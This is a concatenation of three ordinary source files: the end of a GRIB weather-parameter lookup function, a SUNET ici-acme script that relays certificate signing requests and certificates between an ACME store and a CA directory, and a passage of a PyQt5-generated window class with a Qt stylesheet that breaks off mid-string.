if table2Version == 253 and indicatorOfParameter == 61:
return 'RR-KGM2'
if table2Version == 253 and indicatorOfParameter == 58:
return 'CLDICE-KGKG'
if table2Version == 253 and indicatorOfParameter == 57:
return 'EVAP-KGM2'
if table2Version == 253 and indicatorOfParameter == 54:
return 'PRCWAT-KGM2'
if table2Version == 253 and indicatorOfParameter == 52:
return 'RH-PRCNT'
if table2Version == 253 and indicatorOfParameter == 51:
return 'Q-KGKG'
if table2Version == 253 and indicatorOfParameter == 41:
return 'ABSVO-HZ'
if table2Version == 253 and indicatorOfParameter == 40:
return 'VV-MS'
if table2Version == 253 and indicatorOfParameter == 39:
return 'VV-PAS'
if table2Version == 253 and indicatorOfParameter == 34:
return 'V-MS'
if table2Version == 253 and indicatorOfParameter == 33:
return 'U-MS'
if table2Version == 253 and indicatorOfParameter == 20:
return 'VV-M'
if table2Version == 253 and indicatorOfParameter == 17:
return 'TD-K'
if table2Version == 253 and indicatorOfParameter == 16:
return 'TMIN-C'
if table2Version == 253 and indicatorOfParameter == 15:
return 'TMAX-C'
if table2Version == 253 and indicatorOfParameter == 13:
return 'TP-K'
if table2Version == 253 and indicatorOfParameter == 11:
return 'T-K'
if table2Version == 253 and indicatorOfParameter == 8:
return 'HL-M'
if table2Version == 253 and indicatorOfParameter == 6:
return 'Z-M2S2'
if table2Version == 253 and indicatorOfParameter == 2:
return 'P-PA'
if table2Version == 253 and indicatorOfParameter == 1:
return 'P-PA'
if table2Version == 205 and indicatorOfParameter == 14:
return 'IFF-MS'
if table2Version == 205 and indicatorOfParameter == 13:
return 'IDD-D'
if table2Version == 205 and indicatorOfParameter == 12:
return 'IRCNCT-PRCNT'
if table2Version == 205 and indicatorOfParameter == 11:
return 'IRAFTTHK-CM'
if table2Version == 205 and indicatorOfParameter == 10:
return 'IRIDGC-PRCNT'
if table2Version == 205 and indicatorOfParameter == 9:
return 'IMEANTHK-CM'
if table2Version == 205 and indicatorOfParameter == 8:
return 'IVELV-MS'
if table2Version == 205 and indicatorOfParameter == 7:
return 'IVELU-MS'
if table2Version == 205 and indicatorOfParameter == 6:
return 'IRIDGE-CM'
if table2Version == 205 and indicatorOfParameter == 5:
return 'IMAXTHK-CM'
if table2Version == 205 and indicatorOfParameter == 4:
return 'IMINTHK-CM'
if table2Version == 205 and indicatorOfParameter == 3:
return 'ITHK-CM'
if table2Version == 205 and indicatorOfParameter == 2:
return 'ICNCT-PRCNT'
if table2Version == 205 and indicatorOfParameter == 1:
return 'TSEA-C'
if table2Version == 203 and indicatorOfParameter == 255:
return 'PRECFORM2-N'
if table2Version == 203 and indicatorOfParameter == 254:
return 'CIN-500-N'
if table2Version == 203 and indicatorOfParameter == 253:
return 'CAPE1040-500'
if table2Version == 203 and indicatorOfParameter == 252:
return 'CAPE-0-3-500'
if table2Version == 203 and indicatorOfParameter == 251:
return 'CAPE-0-3'
if table2Version == 203 and indicatorOfParameter == 250:
return 'EL-500-M'
if table2Version == 203 and indicatorOfParameter == 249:
return 'LFC-500-M'
if table2Version == 203 and indicatorOfParameter == 248:
return 'LCL-500-M'
if table2Version == 203 and indicatorOfParameter == 247:
return 'EL-500-HPA'
if table2Version == 203 and indicatorOfParameter == 246:
return 'LFC-500-HPA'
if table2Version == 203 and indicatorOfParameter == 245:
return 'LCL-500-HPA'
if table2Version == 203 and indicatorOfParameter == 244:
return 'CIN-N'
if table2Version == 203 and indicatorOfParameter == 243:
return 'CAPE1040'
if table2Version == 203 and indicatorOfParameter == 242:
return 'CAPE-500'
if table2Version == 203 and indicatorOfParameter == 241:
return 'CAPE-JKG'
if table2Version == 203 and indicatorOfParameter == 240:
return 'EL-M'
if table2Version == 203 and indicatorOfParameter == 239:
return 'LFC-M'
if table2Version == 203 and indicatorOfParameter == 238:
return 'LCL-M'
if table2Version == 203 and indicatorOfParameter == 237:
return 'EL-HPA'
if table2Version == 203 and indicatorOfParameter == 236:
return 'LFC-HPA'
if table2Version == 203 and indicatorOfParameter == 235:
return 'LCL-HPA'
if table2Version == 203 and indicatorOfParameter == 234:
return 'F100-FF-MS'
if table2Version == 203 and indicatorOfParameter == 233:
return 'F90-FF-MS'
if table2Version == 203 and indicatorOfParameter == 232:
return 'F75-FF-MS'
if table2Version == 203 and indicatorOfParameter == 231:
return 'F50-FF-MS'
if table2Version == 203 and indicatorOfParameter == 230:
return 'F25-FF-MS'
if table2Version == 203 and indicatorOfParameter == 229:
return 'F10-FF-MS'
if table2Version == 203 and indicatorOfParameter == 228:
return 'F0-FF-MS'
if table2Version == 203 and indicatorOfParameter == 227:
return 'F100-FFG-MS'
if table2Version == 203 and indicatorOfParameter == 226:
return 'F90-FFG-MS'
if table2Version == 203 and indicatorOfParameter == 225:
return 'F75-FFG-MS'
if table2Version == 203 and indicatorOfParameter == 224:
return 'F50-FFG-MS'
if table2Version == 203 and indicatorOfParameter == 223:
return 'F25-FFG-MS'
if table2Version == 203 and indicatorOfParameter == 222:
return 'F10-FFG-MS'
if table2Version == 203 and indicatorOfParameter == 221:
return 'F0-FFG-MS'
if table2Version == 203 and indicatorOfParameter == 220:
return 'F100-N-0TO1'
if table2Version == 203 and indicatorOfParameter == 219:
return 'F90-N-0TO1'
if table2Version == 203 and indicatorOfParameter == 218:
return 'F75-N-0TO1'
if table2Version == 203 and indicatorOfParameter == 217:
return 'F50-N-0TO1'
if table2Version == 203 and indicatorOfParameter == 216:
return 'F25-N-0TO1'
if table2Version == 203 and indicatorOfParameter == 215:
return 'F10-N-0TO1'
if table2Version == 203 and indicatorOfParameter == 214:
return 'F0-N-0TO1'
if table2Version == 203 and indicatorOfParameter == 213:
return 'RRRS-KGM2'
if table2Version == 203 and indicatorOfParameter == 212:
return 'GRR-MMH'
if table2Version == 203 and indicatorOfParameter == 211:
return 'VEGET-N'
if table2Version == 203 and indicatorOfParameter == 210:
return 'VFLMOM-NM2'
if table2Version == 203 and indicatorOfParameter == 209:
return 'UFLMOM-NM2'
if table2Version == 203 and indicatorOfParameter == 208:
return 'TKEN-JKG'
if table2Version == 203 and indicatorOfParameter == 207:
return 'SOILTY-N'
if table2Version == 203 and indicatorOfParameter == 206:
return 'ILSAA1-N'
if table2Version == 203 and indicatorOfParameter == 205:
return 'CAPE1040-MU'
if table2Version == 203 and indicatorOfParameter == 204:
return 'CAPE-0-3-MU'
if table2Version == 203 and indicatorOfParameter == 203:
return 'FLMOM-PA'
if table2Version == 203 and indicatorOfParameter == 202:
return 'FLSEN-JM2'
if table2Version == 203 and indicatorOfParameter == 201:
return 'FLLAT-JM2'
if table2Version == 203 and indicatorOfParameter == 200:
return 'CANW-KGM2'
if table2Version == 203 and indicatorOfParameter == 199:
return 'CIN-MU-N'
if table2Version == 203 and indicatorOfParameter == 198:
return 'O3ANOM-PRCNT'
if table2Version == 203 and indicatorOfParameter == 197:
return 'UVI-N'
if table2Version == 203 and indicatorOfParameter == 196:
return 'UVIMAX-N'
if table2Version == 203 and indicatorOfParameter == 195:
return 'CAPE-MU-JKG'
if table2Version == 203 and indicatorOfParameter == 194:
return 'EL-MU-M'
if table2Version == 203 and indicatorOfParameter == 193:
return 'F100-RR-6'
if table2Version == 203 and indicatorOfParameter == 192:
return 'F90-RR-6'
if table2Version == 203 and indicatorOfParameter == 191:
return 'F75-RR-6'
if table2Version == 203 and indicatorOfParameter == 190:
return 'F50-RR-6'
if table2Version == 203 and indicatorOfParameter == 189:
return 'F25-RR-6'
if table2Version == 203 and indicatorOfParameter == 188:
return 'F10-RR-6'
if table2Version == 203 and indicatorOfParameter == 187:
return 'F0-RR-6'
if table2Version == 203 and indicatorOfParameter == 186:
return 'SM-KGM2'
if table2Version == 203 and indicatorOfParameter == 185:
return 'LFC-MU-M'
if table2Version == 203 and indicatorOfParameter == 184:
return 'LCL-MU-M'
if table2Version == 203 and indicatorOfParameter == 183:
return 'SR-M'
if table2Version == 203 and indicatorOfParameter == 182:
return 'EL-MU-HPA'
if table2Version == 203 and indicatorOfParameter == 181:
return 'LFC-MU-HPA'
if table2Version == 203 and indicatorOfParameter == 180:
return 'LCL-MU-HPA'
if table2Version == 203 and indicatorOfParameter == 179:
return 'F100-T-K'
if table2Version == 203 and indicatorOfParameter == 178:
return 'F90-T-K'
if table2Version == 203 and indicatorOfParameter == 177:
return 'F75-T-K'
if table2Version == 203 and indicatorOfParameter == 176:
return 'F50-T-K'
if table2Version == 203 and indicatorOfParameter == 175:
return 'F25-T-K'
if table2Version == 203 and indicatorOfParameter == 174:
return 'F10-T-K'
if table2Version == 203 and indicatorOfParameter == 173:
return 'F0-T-K'
if table2Version == 203 and indicatorOfParameter == 172:
return 'TTI-N'
if table2Version == 203 and indicatorOfParameter == 171:
return 'VTI-N'
if table2Version == 203 and indicatorOfParameter == 170:
return 'CTI-N'
if table2Version == 203 and indicatorOfParameter == 169:
return 'LI-N'
if table2Version == 203 and indicatorOfParameter == 168:
return 'SI-N'
if table2Version == 203 and indicatorOfParameter == 167:
return 'MIXHGT-M'
if table2Version == 203 and indicatorOfParameter == 166:
return 'RSI-KGM2'
if table2Version == 203 and indicatorOfParameter == 165:
return 'RRI-KGM2'
if table2Version == 203 and indicatorOfParameter == 164:
return 'SRMOM-M'
if table2Version == 203 and indicatorOfParameter == 163:
return 'MOL-M'
if table2Version == 203 and indicatorOfParameter == 161:
return 'PROBSN-0TO1'
if table2Version == 203 and indicatorOfParameter == 159:
return 'EFI-RR'
if table2Version == 203 and indicatorOfParameter == 158:
return 'EFI-WG'
if table2Version == 203 and indicatorOfParameter == 157:
return 'EFI-T'
if table2Version == 203 and indicatorOfParameter == 156:
return 'EFI-WS'
if table2Version == 203 and indicatorOfParameter == 155:
return 'PROB-WG-3'
if table2Version == 203 and indicatorOfParameter == 154:
return 'PROB-WG-2'
if table2Version == 203 and indicatorOfParameter == 153:
return 'PROB-WG-1'
if table2Version == 203 and indicatorOfParameter == 152:
return 'PROB-W-2'
if table2Version == 203 and indicatorOfParameter == 151:
return 'PROB-W-1'
if table2Version == 203 and indicatorOfParameter == 150:
return 'TPE3-C'
if table2Version == 203 and indicatorOfParameter == 149:
return 'FF1500-MS'
if table2Version == 203 and indicatorOfParameter == 148:
return 'HLCY-1-M2S2'
if table2Version == 203 and indicatorOfParameter == 147:
return 'HLCY-M2S2'
if table2Version == 203 and indicatorOfParameter == 146:
return 'WSH-1-KT'
if table2Version == 203 and indicatorOfParameter == 145:
return 'WSH-KT'
if table2Version == 203 and indicatorOfParameter == 144:
return 'PROB-RR-4'
if table2Version == 203 and indicatorOfParameter == 143:
return 'PROB-RR-3'
if table2Version == 203 and indicatorOfParameter == 142:
return 'PROB-RR-2'
if table2Version == 203 and indicatorOfParameter == 141:
return 'PROB-RR-1'
if table2Version == 203 and indicatorOfParameter == 134:
return 'PROB-T-4'
if table2Version == 203 and indicatorOfParameter == 133:
return 'PROB-T-3'
if table2Version == 203 and indicatorOfParameter == 132:
return 'PROB-T-2'
if table2Version == 203 and indicatorOfParameter == 131:
return 'PROB-T-1'
if table2Version == 203 and indicatorOfParameter == 130:
return 'ABSH-KGM3'
if table2Version == 203 and indicatorOfParameter == 129:
return 'TPE-K'
if table2Version == 203 and indicatorOfParameter == 128:
return 'RNETSW-WM2'
if table2Version == 203 and indicatorOfParameter == 126:
return 'RTOPLW-WM2'
if table2Version == 203 and indicatorOfParameter == 122:
return 'Z-C6-M2S2'
if table2Version == 203 and indicatorOfParameter == 121:
return 'Z-C5-M2S2'
if table2Version == 203 and indicatorOfParameter == 120:
return 'Z-C4-M2S2'
if table2Version == 203 and indicatorOfParameter == 119:
return 'Z-C3-M2S2'
if table2Version == 203 and indicatorOfParameter == 118:
return 'Z-C2-M2S2'
if table2Version == 203 and indicatorOfParameter == 117:
return 'Z-C1-M2S2'
if table2Version == 203 and indicatorOfParameter == 116:
return 'T-C6-C'
if table2Version == 203 and indicatorOfParameter == 115:
return 'T-C5-C'
if table2Version == 203 and indicatorOfParameter == 114:
return 'T-C4-C'
if table2Version == 203 and indicatorOfParameter == 113:
return 'T-C3-C'
if table2Version == 203 and indicatorOfParameter == 112:
return 'T-C2-C'
if table2Version == 203 and indicatorOfParameter == 111:
return 'T-C1-C'
if table2Version == 203 and indicatorOfParameter == 110:
return 'SNR-KGM2'
if table2Version == 203 and indicatorOfParameter == 109:
return 'SNRC-KGM2'
if table2Version == 203 and indicatorOfParameter == 108:
return 'SNRL-KGM2'
if table2Version == 203 and indicatorOfParameter == 107:
return 'SNC-KGM2'
if table2Version == 203 and indicatorOfParameter == 106:
return 'SNL-KGM2'
if table2Version == 203 and indicatorOfParameter == 105:
return 'CLDCND-KGKG'
if table2Version == 203 and indicatorOfParameter == 104:
return 'CLDICE-KGKG'
if table2Version == 203 and indicatorOfParameter == 103:
return 'ICING-N'
if table2Version == 203 and indicatorOfParameter == 102:
return 'SSICING-N'
if table2Version == 203 and indicatorOfParameter == 101:
return 'RHO-KGM3'
if table2Version == 203 and indicatorOfParameter == 100:
return 'IC-0TO1'
if table2Version == 203 and indicatorOfParameter == 99:
return 'LC-0TO1'
if table2Version == 203 and indicatorOfParameter == 96:
return 'RADGLO-WM2'
if table2Version == 203 and indicatorOfParameter == 95:
return 'RADLW-WM2'
if table2Version == 203 and indicatorOfParameter == 91:
return 'HESSAA-N'
if table2Version == 203 and indicatorOfParameter == 89:
return 'ALBEDO'
if table2Version == 203 and indicatorOfParameter == 80:
return 'KINDEX-N'
if table2Version == 203 and indicatorOfParameter == 79:
return 'N-PRCNT'
if table2Version == 203 and indicatorOfParameter == 78:
return 'CLDWAT-KGKG'
if table2Version == 203 and indicatorOfParameter == 77:
return 'LSSN-M100'
if table2Version == 203 and indicatorOfParameter == 75:
return 'TG-K'
if table2Version == 203 and indicatorOfParameter == 74:
return 'LNSP-N'
if table2Version == 203 and indicatorOfParameter == 73:
return 'RRRL-KGM2'
if table2Version == 203 and indicatorOfParameter == 72:
return 'RRRC-KGM2'
if table2Version == 203 and indicatorOfParameter == 71:
return 'RRR-KGM2'
if table2Version == 203 and indicatorOfParameter == 70:
return 'H0C-M'
if table2Version == 203 and indicatorOfParameter == 69:
return 'RNETLW-WM2'
if table2Version == 203 and indicatorOfParameter == 68:
return 'SNACC-KGM2'
if table2Version == 203 and indicatorOfParameter == 63:
return 'RRC-MM10'
if table2Version == 203 and indicatorOfParameter == 62:
return 'RRL-MM10'
if table2Version == 203 and indicatorOfParameter == 60:
return 'SMOGI-N'
if table2Version == 203 and indicatorOfParameter == 59:
return 'PRECFORM-N'
if table2Version == 203 and indicatorOfParameter == 58:
return 'RR-3-MM'
if table2Version == 203 and indicatorOfParameter == 57:
return 'RR-2-MM'
if table2Version == 203 and indicatorOfParameter == 56:
return 'RR-1-MM'
if table2Version == 203 and indicatorOfParameter == 55:
return 'RR-12-MM'
if table2Version == 203 and indicatorOfParameter == 54:
return 'RR-6-MM'
if table2Version == 203 and indicatorOfParameter == 53:
return 'HSADE2-N'
if table2Version == 203 and indicatorOfParameter == 52:
return 'HSADE1-N'
if table2Version == 203 and indicatorOfParameter == 51:
return 'SD-M'
if table2Version == 203 and indicatorOfParameter == 50:
return 'RR-MM10'
if table2Version == 203 and indicatorOfParameter == 47:
return 'PRCWAT-KGM2'
if table2Version == 203 and indicatorOfParameter == 44:
return 'VV-MS'
if table2Version == 203 and indicatorOfParameter == 43:
return 'VV-MMS'
if table2Version == 203 and indicatorOfParameter == 40:
return 'VV-PAS'
if table2Version == 203 and indicatorOfParameter == 39:
return 'FF10-MS'
if table2Version == 203 and indicatorOfParameter == 38:
return 'AQI-N'
if table2Version == 203 and indicatorOfParameter == 31:
return 'ABSVO-HZ-5'
if table2Version == 203 and indicatorOfParameter == 28:
return 'HM20C-M'
if table2Version == 203 and indicatorOfParameter == 27:
return 'FFG-MS'
if table2Version == 203 and indicatorOfParameter == 24:
return 'V-MS'
if table2Version == 203 and indicatorOfParameter == 23:
return 'U-MS'
if table2Version == 203 and indicatorOfParameter == 22:
return 'DF-MS'
if table2Version == 203 and indicatorOfParameter == 21:
return 'FF-MS'
if table2Version == 203 and indicatorOfParameter == 20:
return 'DD-D'
if table2Version == 203 and indicatorOfParameter == 19:
return 'FOGSYM-N'
if table2Version == 203 and indicatorOfParameter == 18:
return 'FRNTSYM-N'
if table2Version == 203 and indicatorOfParameter == 15:
return 'CLDSYM-N'
if table2Version == 203 and indicatorOfParameter == 13:
return 'RH-PRCNT'
if table2Version == 203 and indicatorOfParameter == 12:
return 'Q-KGKG'
if table2Version == 203 and indicatorOfParameter == 10:
return 'TD-C'
if table2Version == 203 and indicatorOfParameter == 9:
return 'TPW-K'
if table2Version == 203 and indicatorOfParameter == 8:
return 'TP-K'
if table2Version == 203 and indicatorOfParameter == 4:
return 'T-C'
if table2Version == 203 and indicatorOfParameter == 3:
return 'HL-M'
if table2Version == 203 and indicatorOfParameter == 2:
return 'Z-M2S2'
if table2Version == 203 and indicatorOfParameter == 1:
return 'P-HPA'
return wrapped
|
<reponame>SUNET/ici-acme
#!/usr/bin/env python3
#
# Copyright 2019 SUNET. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are
# permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of
# conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list
# of conditions and the following disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY SUNET ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL SUNET OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those of the
# authors and should not be interpreted as representing official policies, either expressed
# or implied, of SUNET.
#
# Author : <NAME> <<EMAIL>>
#
"""
Monitor the ici-acme store for CSRs and pass them to the ICI CA. Monitor results from ICI
and put the generated certificates back into the ici-acme store.
"""
import argparse
import logging
import logging.handlers
import os
import sys
import inotify.adapters
import yaml
from inotify.constants import IN_MODIFY, IN_MOVED_TO
_defaults = {'syslog': True,
'debug': False,
'store_dir': os.path.join(os.getcwd(), 'data/certificate'),
'ici_input_dir': '/var/lib/ici/example/requests/server',
'ici_output_dir': '/var/lib/ici/example/out-certs',
'cert_chain': '/var/lib/ici/example/ca.crt',
'timeout': 60,
}
def parse_args(defaults):
parser = argparse.ArgumentParser(description = 'ICI <-> ICI-ACME interface',
add_help = True,
formatter_class = argparse.ArgumentDefaultsHelpFormatter,
)
# Optional arguments
parser.add_argument('--store_dir',
dest = 'store_dir',
metavar = 'DIR', type = str,
default = defaults['store_dir'],
help = 'ICI-ACME store directory to monitor',
)
parser.add_argument('--ici_input_dir',
dest = 'ici_input_dir',
metavar = 'DIR', type = str,
default = defaults['ici_input_dir'],
help = 'ICI-CA input directory (where to put CSRs)',
)
parser.add_argument('--ici_output_dir',
dest = 'ici_output_dir',
metavar = 'DIR', type = str,
default = defaults['ici_output_dir'],
help = 'ICI-CA output directory (where to get certificates)',
)
parser.add_argument('--cert_chain',
dest = 'cert_chain',
metavar = 'FILE', type = str,
default = defaults['cert_chain'],
help = 'File with ICI CA cert',
)
parser.add_argument('--timeout',
dest = 'timeout',
metavar = 'SECONDS', type = int,
default = defaults['timeout'],
help = 'Re-check files at least this often',
)
parser.add_argument('--debug',
dest = 'debug',
action = 'store_true', default = defaults['debug'],
help = 'Enable debug operation',
)
parser.add_argument('--syslog',
dest = 'syslog',
action = 'store_true', default = defaults['syslog'],
help = 'Enable syslog output',
)
args = parser.parse_args()
return args
def init_logger(myname, args):
# This is the root log level
level = logging.INFO
if args.debug:
level = logging.DEBUG
logging.basicConfig(level = level, stream = sys.stderr,
format='%(asctime)s: %(name)s: %(levelname)s %(message)s')
logger = logging.getLogger(myname)
# If stderr is not a TTY, change the log level of the StreamHandler (stream = sys.stderr above) to WARNING
if not sys.stderr.isatty() and not args.debug:
for this_h in logging.getLogger('').handlers:
this_h.setLevel(logging.WARNING)
if args.syslog:
syslog_h = logging.handlers.SysLogHandler()
formatter = logging.Formatter('%(name)s: %(levelname)s %(message)s')
syslog_h.setFormatter(formatter)
logger.addHandler(syslog_h)
return logger
def main(args, logger):
i = inotify.adapters.Inotify()
# construct mask by or-ing constants
i.add_watch(args.store_dir, mask=(IN_MOVED_TO))
i.add_watch(args.ici_output_dir, mask=(IN_MODIFY))
logger.info(f'Waiting for file system events under {args.store_dir} and {args.ici_output_dir}')
ignore_store_events = {}
for event in i.event_gen(yield_nones = True):
if event is None:
# Whenever there are no events for args.timeout seconds, we poll
# the files to make sure we didn't miss anything
# TODO: implement this
continue
(_header, type_names, path, filename) = event
logger.debug(f'Received file system event: path={repr(path)} fn={repr(filename)}, types={repr(type_names)!r}')
if path == args.store_dir and filename.endswith('.yaml'):
if ignore_store_events.pop(filename, False):
# The event was generated because this script modified the file
continue
store_fn = os.path.join(path, filename)
with open(store_fn, 'r') as fd:
data = yaml.safe_load(fd.read())
if 'csr' in data and data.get('certificate') is None:
logger.info(f'Processing CSR in file {store_fn}')
cert_id = filename.split('.')[0]
out_fn = os.path.join(args.ici_input_dir, cert_id + '.csr')
with open(out_fn, 'w') as out:
out.write('-----BEGIN CERTIFICATE REQUEST-----\n' +
data['csr'] + '\n' +
'-----END CERTIFICATE REQUEST-----\n')
logger.info(f'Wrote CSR from request {cert_id}.csr to file {out_fn}')
elif path == args.ici_output_dir and filename.endswith('.pem'):
cert_fn = os.path.join(path, filename)
logger.info(f'Processing certificate in file {cert_fn}')
with open(cert_fn, 'r') as fd:
cert_data = fd.read()
cert_id = filename.split('.')[0]
store_fn = os.path.join(args.store_dir, cert_id + '.yaml')
if not os.path.isfile(store_fn):
logger.error(f'Could not find ici-acme store certificate: {store_fn}')
continue
cert_chain = None
if args.cert_chain:
with open(args.cert_chain, 'r') as fd:
cert_chain = [fd.read()]
with open(store_fn, 'r') as fd:
data = yaml.safe_load(fd.read())
if data.get('certificate') is not None:
logger.error(f'There is already a certificate in file {store_fn}')
data['certificate'] = cert_data
data['cert_chain'] = cert_chain
ignore_store_events[filename] = True
with open(store_fn, 'w') as fd:
fd.write(yaml.safe_dump(data))
logger.debug(f'Saved certificate in ici-acme store file {store_fn}')
return False
if __name__ == '__main__':
try:
progname = os.path.basename(sys.argv[0])
args = parse_args(_defaults)
logger = init_logger(progname, args)
res = main(args, logger)
if res is True:
sys.exit(0)
if res is False:
sys.exit(1)
sys.exit(int(res))
except KeyboardInterrupt:
sys.exit(0)
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'C:\Python projects\DPR\Source\GUI.ui'
#
# Created by: PyQt5 UI code generator 5.11.3
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1011, 701)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("icon.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
MainWindow.setWindowIcon(icon)
MainWindow.setStyleSheet("/* QGroupBox -------------------------------------------------------------- */\n"
"QGroupBox {\n"
" font-weight: bold;\n"
" border: 2px solid #DCDCDC;\n"
" border-radius: 4px;\n"
" padding: 4px;\n"
" margin-top: 16px;\n"
" background-color: #F7FBFD\n"
"}\n"
"\n"
"QGroupBox::title {\n"
" subcontrol-origin: margin;\n"
" subcontrol-position: top left;\n"
" left: 3px;\n"
" padding-left: 3px;\n"
" padding-right: 5px;\n"
" padding-top: 8px;\n"
" padding-bottom: 16px;\n"
"}\n"
"\n"
"QGroupBox#groupBox_7 {\n"
" background-color: #B2D5EE;\n"
" border: 2px solid #52636E;\n"
" color: #000000;\n"
" border-radius: 4px;\n"
" outline: none;\n"
"}\n"
"\n"
"/* QTabBar -------------------------------------------------------------- */\n"
"QTabBar::tab:top {\n"
" background-color: #E1E1E1;\n"
" color: #000000;\n"
" margin-left: 2px;\n"
" min-width: 5px;\n"
" border-bottom: 3px solid #E1E1E1;\n"
" padding-left: 4px;\n"
" padding-right: 4px;\n"
" padding-top: 2px;\n"
" padding-bottom: 2px;\n"
" border-top-left-radius: 3px;\n"
" border-top-right-radius: 3px;\n"
" border: 1px solid #DCDCDC;\n"
"}\n"
"\n"
"QTabBar::tab:top:selected {\n"
" background-color: #FFFFFF;\n"
" color: #000000;\n"
" border-bottom: 3px solid #FFFFFF;\n"
" border-top-left-radius: 3px;\n"
" border-top-right-radius: 3px;\n"
"}\n"
"\n"
"QTabBar::tab:top:!selected:hover {\n"
" background-color: #E5F1FB;\n"
" border: 1px solid #DCDCDC;\n"
"}\n"
"\n"
"/* QTabWiget -------------------------------------------------------------- */\n"
"QTabWidget::pane {\n"
" border: 2px solid #7e99b4;\n"
" border-radius: 4px;\n"
" margin: 0px;\n"
" background-color: #E6EFF4;\n"
"}\n"
"\n"
"/* QPushButton -------------------------------------------------------------- */\n"
"QPushButton {\n"
" background-color: #E1E1E1;\n"
" border: 1px solid #ADADAD;\n"
" color: #000000;\n"
" border-radius: 4px;\n"
" outline: none;\n"
"}\n"
"\n"
"QPushButton:hover,\n"
"QPushButton:checked:hover{\n"
" border: 1px solid #0078D7;\n"
" background-color: #E5F1FB;\n"
" color: #000000;\n"
"}\n"
"\n"
"QPushButton:pressed {\n"
" background-color: #CCE4F7;\n"
" border: 1px solid #00559B;\n"
" color: #000000;\n"
"}\n"
"\n"
"QPushButton:disabled {\n"
" background-color: #E1E1E1;\n"
" border: 1px solid #ADADAD;\n"
" color: #787878;\n"
" border-radius: 4px;\n"
" outline: none;\n"
"}\n"
"\n"
"/* QDateEdit-------------------------------------------------------------- */\n"
"QDateEdit {\n"
" background-color: white;\n"
" selection-background-color: #1464A0;\n"
" border-style: solid;\n"
" border: 1px solid #7A7A7A;\n"
" border-radius: 4px;\n"
" padding-top: 2px; /* This fix #103, #111*/\n"
" padding-bottom: 2px; /* This fix #103, #111*/\n"
" padding-left: 4px;\n"
" padding-right: 4px;\n"
" min-width: 10px;\n"
"}\n"
"\n"
"QDateEdit:hover {\n"
" border-style: solid;\n"
" border: 1px solid #000000;\n"
"}\n"
"\n"
"\n"
"QDateEdit::drop-down {\n"
" border-top-right-radius: 3px;\n"
" border-bottom-right-radius: 3px;\n"
"}\n"
"\n"
"\n"
"QDateEdit::down-arrow {\n"
" image: url(down_arrow.png);\n"
"}\n"
"\n"
"QDateEdit::down-arrow:on,\n"
"QDateEdit::down-arrow:hover,\n"
"QDateEdit::down-arrow:focus {\n"
" image: url(down_arrow.png);\n"
"}\n"
"\n"
"QDateEdit QAbstractItemView {\n"
" background-color: #FFFFFF;\n"
" border-radius: 4px;\n"
" border-style: solid;\n"
" border: 1px solid #DCDCDC;\n"
" selection-background-color: #0078D7;\n"
"}\n"
"\n"
"QDateEdit QAbstractItemView:hover {\n"
" background-color: #FFFFFF;\n"
" border-radius: 4px;\n"
" border-style: solid;\n"
" border: 1px solid #0078D7;\n"
" selection-background-color: #0078D7;\n"
"}\n"
"\n"
"QDateEdit QCalendarWidget {\n"
" background-color: #FFFFFF;\n"
"}\n"
"\n"
"QLineEdit {\n"
" background-color: #FFFFFF;\n"
" border-style: solid; /* without this border reverts for disabled */\n"
" border: 1px solid #7A7A7A;\n"
" color: #000000;\n"
" border-radius: 4px;\n"
" outline: none;\n"
"}\n"
"\n"
"QLineEdit:hover{\n"
" border: 1px solid #000000;\n"
" background-color: #FFFFFF;\n"
" color: #000000;\n"
"}\n"
"\n"
"/* QCombobox -------------------------------------------------------------- */\n"
"QComboBox {\n"
" background-color: #E1E1E1;\n"
" border: 1px solid #ADADAD;\n"
" color: #000000;\n"
" border-radius: 4px;\n"
" outline: none;\n"
"}\n"
"\n"
"QComboBox:hover,\n"
"QComboBox:checked:hover{\n"
" border: 1px solid #0078D7;\n"
" background-color: #E5F1FB;\n"
" color: #000000;\n"
"}\n"
"\n"
"QComboBox::drop-down \n"
"{\n"
" border: 0px;\n"
"}\n"
"\n"
"\n"
"QComboBox::down-arrow {\n"
" image: url(down_arrow.png);\n"
"}\n"
"\n"
"QComboBox::down-arrow:on,\n"
"QComboBox::down-arrow:hover,\n"
"QComboBox::down-arrow:focus {\n"
" image: url(down_arrow.png);\n"
"}\n"
"\n"
"QComboBox QAbstractItemView {\n"
" background: #E5F1FB;\n"
" border-radius: 4px;\n"
" border: 1px solid #F7FFF7;\n"
" selection-color: #000000;\n"
" selection-background-color: #CCE4F7;\n"
"}\n"
"\n"
"/* QProgressBar ----------------------------------------------------------- */\n"
"QProgressBar {\n"
" background-color: #E6E6E6;\n"
" border: 1px solid #BCBCBC;\n"
" color: #000000;\n"
" border-radius: 4px;\n"
" text-align: center;\n"
"}\n"
"\n"
"QProgressBar::chunk {\n"
" background-color: #EFC649;\n"
" /*default background-color: #06B025;*/\n"
" color: #000000;\n"
" border-radius: 4px;\n"
"}\n"
"\n"
"/* QTableView -------------------------------------------------------------- */\n"
"QListView,\n"
"QTreeView,\n"
"QTableView,\n"
